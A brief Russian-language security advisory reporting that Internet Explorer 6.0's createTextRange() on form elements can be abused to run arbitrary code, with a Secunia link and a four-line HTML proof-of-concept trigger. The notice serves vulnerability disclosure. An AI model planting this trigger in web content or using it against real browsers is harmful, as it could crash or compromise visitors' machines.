Программа: Internet Explorer 6.0
Функция createTextRange(), вызываемая для
элементов форм, может быть использована для
выполнения произвольного кода на
компьютере жертвы. Подробности: http://secunia.com/advisories/18680/.
Пример:
<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>